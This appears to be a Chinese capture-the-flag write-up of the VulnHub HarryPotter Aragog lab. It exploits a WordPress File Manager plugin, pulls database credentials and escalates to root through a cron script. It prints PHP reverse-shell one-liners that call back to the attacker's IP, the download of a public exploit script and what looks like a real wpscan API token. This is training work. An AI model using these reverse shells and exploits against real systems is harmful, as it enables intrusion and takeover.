Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1

这篇具有很好参考价值的文章主要介绍了Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

靶机文档:HarryPotter: Aragog (1.0.2)

下载地址:Download (Mirror)

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

方式一

信息收集

主机发现
 sudo arp-scan -l

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

端口扫描

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

目录扫描

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

看到这里扫出来目录中,index.htmljavascript, server-status,blog下的部分目录,并且出现了wp-login.php,这也说明了这是一个wordpress的cms框架

index.html

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

blog

网页没有样式

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

查看网页源码

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

做域名ip映射 /etc/hosts

域名:wordpress.aragog.hogwarts IP:自己要访问靶机的机器的IP地址

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

发现是 WordPress 系统,用 wpscan 扫一下,加上 api-token 扫:

wpscan工具

WPScan是一个扫描WordPress漏洞的扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的

漏洞利用

msf工具
msf6 > search wordpress file manager

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

use 1
info

查看需要配置的信息

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

hagrid98家目录下得到一串base64格式加密的数据

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

使用BurpSuiteDecoder功能解码

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

数据库权限

找一下数据库的用户名密码,查看数据库中有没有可利用信息

在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码,可以用于登录数据库

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell变成了交互式shell),输入下面命令即可拿到tty shell

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

使用得到用户名root,密码mySecr3tPass,来连接数据库

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

wordpress数据库保存的用户名和密码一般都放在wp_users表里面的

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

在线解密网站

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

用户名:hagrid98,密码:password123

用户权限

尝试SSH远程连接

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

root提权

使用sudo suid查询后发现没有可利用的

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

然后查找备份文件,查看有没有.sh结尾的文件

find / -name '*.sh'

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行

在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

<?php $sock=fsockopen("192.168.80.141 ",6868);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

/usr/bin/php是php的执行文件的目录,这样才能执行php文件

其实也可以直接在.backup.sh里面直接写一个反弹shell


kali监听6868端口

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

拿到root后可以使用crontab -l,查看当前用户的计划任务列表

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

方式二

信息收集

gobuster扫描
└─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

wpscan扫描
wpscan --api-token=xxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

漏洞利用

POC

访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地

查看脚本的使用方法

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

生成反弹 shell写入到payload.php文件里

php -r '$sock=fsockopen("192.168.80.141",6868);exec("/bin/sh -i <&3 >&3 2>&3");'

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

运行脚本,得到反弹shell地址

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

地址中多写了一个/blog,删除即可

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

等一会就反弹到了

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机文章来源地址https://www.toymoban.com/news/detail-708789.html

到了这里,关于Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • Vulnhub系列靶机--- Hackadmeic.RTB1

    Vulnhub系列靶机--- Hackadmeic.RTB1

    系列:Hackademic(此系列共2台) 难度:初级 信息收集 主机发现 端口扫描 访问80端口 使用指纹识别插件查看是 WordPress 根据首页显示的内容,点击 target 点击 页面能点击的链接,发现点击 Uncategorized 的时候,链接变成了 尝试有无SQL注入,在 ?cat=1 后加上 \\\' ,发现有SQL语句的报

    2024年02月12日
    浏览(9)
  • Vulnhub项目:Aragog

    Vulnhub项目:Aragog

    HarryPotter: Aragog (1.0.2) ~ VulnHub 死亡圣器三部曲之第一部,Aragog是海格养的蜘蛛的名字, 并且又牵扯到了密室 确定靶机ip,攻击机ip,扫描靶机开放端口  只有22,80端口,对80端口进行目录爆破,发现是wordpress框架  这里给了提示,说明是wordpress plugins存在一些可利用的点    查

    2024年02月10日
    浏览(11)
  • 【Vulnhub】搭建Vulnhub靶机

    【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(10)
  • vulnhub靶机Brainpan

    vulnhub靶机Brainpan

    主机发现 arp-scan -l 端口扫描 nmap --min-rate 10000 -p- 192.168.21.156 服务扫描 nmap -sV -sT -O -p9999,10000 192.168.21.156 这个地方感到了有点不对劲,python起来的一个web端口 漏洞扫描 nmap --script=vuln -p9999,10000 192.168.21.156 意料之中,先去看一下web的内容 这个就是一张图片,但是还是扫个目录看

    2024年02月09日
    浏览(11)
  • Vulnhub靶机:driftingblues 2

    Vulnhub靶机:driftingblues 2

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues2(10.0.2.18) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 使用nmap主机发现靶机ip: 10.0.2.18 使用nmap端口扫描发现靶机开放端口: 21、22、80 21端口:nmap扫描发现ftp存在匿名登录

    2024年02月02日
    浏览(10)
  • Vulnhub: blogger:1靶机

    Vulnhub: blogger:1靶机

    kali:192.168.111.111 靶机:192.168.111.176 端口扫描 在80端口的 /assets/fonts/ 目录下发现blog目录,访问后发现为wordpress 利用wpscan发现wordpress插件 wpdiscuz 存在任意文件上传漏洞 msf进行漏洞利用 vagrant用户的密码同样为vagrant vagrant用户sudo权限 提升为root flag

    2024年02月14日
    浏览(11)
  • Vulnhub:DerpNStink 1靶机

    Vulnhub:DerpNStink 1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问 通过wpscan枚举出目标存在admin用户 尝试弱口令admin,登录到wordpress后台,在后台发现插件Slideshow存在任意

    2024年02月08日
    浏览(24)
  • Vulnhub: DarkHole:1靶机

    Vulnhub: DarkHole:1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 访问目标web网站,注册用户 注册时尝试注册用户名为admin的用户,发现存在该用户 进入用户后台,利用burp抓包越权修改其他用户的密码 admin用户密码被修改 经过测试,phtml后缀的文件可以上传并且被当成脚本执行 查找suid权限的

    2024年02月11日
    浏览(12)
  • vulnhub momentum 靶机复盘

    vulnhub momentum 靶机复盘

    到学校了 原来的桥接配置要改 这里记录几个点备忘 重新安装驱动VBoxNetLwf.inf 手动安装VBoxNetLwf.inf 不要用virtualbox自带的netlwfinstall rw init=/bin/bash 进去看看网卡配置 一个没什么功能点的web 在main.js下发现opus-details.php 可以传参id 然后会原封不动的展示 可以xss 没啥用 尝试对cook

    2024年02月06日
    浏览(15)
  • vulnhub——Earth靶机

    vulnhub——Earth靶机

    netdiscover 直接用netdiscover模糊搜索一下主机 可以发现靶机地址为192.168.60.174  80端口返回HTTP400,向下看发现有DNS解析  修改一下hosts文件  再次nmap进行扫描,之前返回HTTP400的页面就没问题了 下面有三行数值  https://terratest.earth.local的页面内容不一样 dirb扫描 http://earth.local、

    2024年02月02日
    浏览(9)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包